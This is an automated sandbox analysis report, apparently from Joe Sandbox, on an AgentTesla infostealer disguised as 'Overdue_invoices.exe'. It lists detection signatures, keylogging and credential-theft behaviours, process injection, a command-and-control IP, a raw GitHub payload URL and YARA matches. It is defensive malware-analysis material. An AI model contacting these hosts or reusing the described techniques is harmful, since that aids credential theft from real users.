Analysis Report Overdue_invoices.exe

Overview

General Information

Sample Name: Overdue_invoices.exe
Analysis ID: 344973
MD5: afa35ee8f27c8a6661219bccb198fd9b
SHA1: 8b86a3066a24586bd5d17ce45ce8bd7984079af0
SHA256: 2d2c26b0f3308bda9e00913401761b8b5026edccfbe12bce7a72cd2d324c2f45
Tags: exe

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
May check the online IP address of the machine
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: Overdue_invoices.exe.6020.1.memstr Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.gmail.com:5874", "Password: ": "", "From: ": ""}
Multi AV Scanner detection for submitted file
Source: Overdue_invoices.exe ReversingLabs: Detection: 17%

Compliance:

barindex
Uses 32bit PE files
Source: Overdue_invoices.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Overdue_invoices.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Networking:

barindex
May check the online IP address of the machine
Source: unknown DNS query: name: icanhazip.com
Source: unknown DNS query: name: icanhazip.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 193.239.147.103 193.239.147.103
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: global traffic HTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: unknown DNS traffic detected: queries for: raw.githubusercontent.com
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://193.239.147.103
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/icanhazip-faq
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com/
Source: Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com4
Source: Overdue_invoices.exe, 00000001.00000002.625776172.00000000018C6000.00000004.00000040.sdmp String found in binary or memory: http://ns.adobe.c/g
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmp String found in binary or memory: http://smtp.gmail.com
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/
Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp, Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/signin/continue?sarp=1&scc=1&plt=AKgnsbt
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrom
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://i.imgur.com/9sS1RPE.png
Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://mail.google.com
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: Overdue_invoices.exe, 00000001.00000002.626078559.00000000030F0000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontenP
Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontenPf~
Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt
Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt)CqbkTHriRRbQjaArtJfFMC#
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: Overdue_invoices.exe, 00000001.00000002.626044350.00000000030E4000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627057496.000000000337F000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.626025797.00000000030D4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/mail/?p=WantAuthError
Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/mail/answer/78754
Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmp String found in binary or memory: https://wa.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/defaLMEM
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0binLMEM
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/Nn
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to log keystrokes (.Net Source)
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs .Net Code: SetHook
Installs a global keyboard hook
Source: C:\Users\user\Desktop\Overdue_invoices.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Overdue_invoices.exe Jump to behavior

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Executable has a suspicious name (potential lure to open the executable)
Source: Overdue_invoices.exe Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Overdue_invoices.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_00AD73B0 0_2_00AD73B0
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_00AD6C38 0_2_00AD6C38
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_00AD5748 0_2_00AD5748
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 1_2_07EF8A38 1_2_07EF8A38
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 1_2_07EF3EC0 1_2_07EF3EC0
Sample file is different than original file name gathered from version info
Source: Overdue_invoices.exe Binary or memory string: OriginalFilename vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230410070.000000000290F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230792815.00000000038E9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHIT.dll* vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000000.209905994.0000000000402000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230130488.0000000000B5A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe Binary or memory string: OriginalFilename vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.629484659.0000000005630000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000000.225837924.0000000000DB2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.624689682.000000000041A000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.625439956.000000000153A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.630778412.0000000006C30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.624879877.0000000001158000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue_invoices.exe
Source: Overdue_invoices.exe Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Uses 32bit PE files
Source: Overdue_invoices.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs Base64 encoded string: 'MrE1thusbvL9jUnxf1Lcqml0/hEjxyBHvYQkHfU0e7ZA3dt4j2WOl2OHNkC7kY9pQCzpNPPRj8Y=', 'iMKrIqJC9ZAyLRDh/GZR6J5a0LtY5Iepg2LkeJHYP3LxSJU5ojpXjijfzghF2Psa', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'MXg5VX5jLbiBy9Cm6tjOR0HiHnsHY5fMkc3wHc95wy56a7HPbHGRobIWKceNtG8f', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'zSUT/U/UiMfSdmJXIlMFYstwqPXc90mjAAO6NC1KQy6trroQ+1O8lQ=='
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/6@4/4
Source: C:\Users\user\Desktop\Overdue_invoices.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue_invoices.exe.log Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Mutant created: \Sessions\1\BaseNamedObjects\KKCDH7XDFH0WWL2TU813
Source: C:\Users\user\Desktop\Overdue_invoices.exe File created: C:\Users\user\AppData\Local\Temp\TMP_pass Jump to behavior
Source: Overdue_invoices.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Overdue_invoices.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Overdue_invoices.exe ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Users\user\Desktop\Overdue_invoices.exe 'C:\Users\user\Desktop\Overdue_invoices.exe'
Source: unknown Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe Jump to behavior
